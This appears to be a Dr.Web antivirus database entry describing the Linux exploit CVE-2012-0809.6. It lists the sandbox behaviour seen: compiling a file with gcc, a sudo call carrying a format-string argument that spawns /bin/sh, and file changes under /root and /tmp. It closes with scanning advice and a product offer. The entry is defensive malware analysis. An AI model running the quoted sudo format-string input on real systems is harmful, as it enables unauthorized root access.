Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.Exploit.CVE-2012-0809.6

Added to the Dr.Web virus database: 2017-12-23

Virus description added:

Technical Information

Malicious functions:
Compiles a program from source codes:
  • /usr/bin/gcc e.c -o e
Launches processes:
  • sh -c /usr/bin/sudo -V
  • /usr/bin/sudo -V
  • sh -c /usr/bin/gcc e.c -o e
  • /usr/bin/sudo %20$08n %*482$ %*2850$ %1073741824$ -D9 -A
  • e
  • /bin/sh
Performs operations with the file system:
Modifies file access rights:
  • /root/e
  • /root/e.sh
Creates or modifies files:
  • /root/e.c
  • /tmp/ccwYlXkC.s
  • /tmp/ccy5U5pk.o
  • /tmp/ccU8l832.res
  • /tmp/cc7PKmGj.c
  • /tmp/cctNXlw2.o
  • /tmp/ccmwfvmL.ld
  • /tmp/ccn8UYcu.le
  • /root/e
  • /root/e.sh
Deletes files:
  • /tmp/ccmwfvmL.ld"
  • /tmp/ccn8UYcu.le"
  • /tmp/cc7PKmGj.c"
  • /tmp/cctNXlw2.o"
  • /tmp/ccU8l832.res"
  • /tmp/ccy5U5pk.o"
  • /tmp/ccwYlXkC.s"
  • /root/e"
  • /root/e.c"
  • /root/e.sh"
Other:
Collects RAM information

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série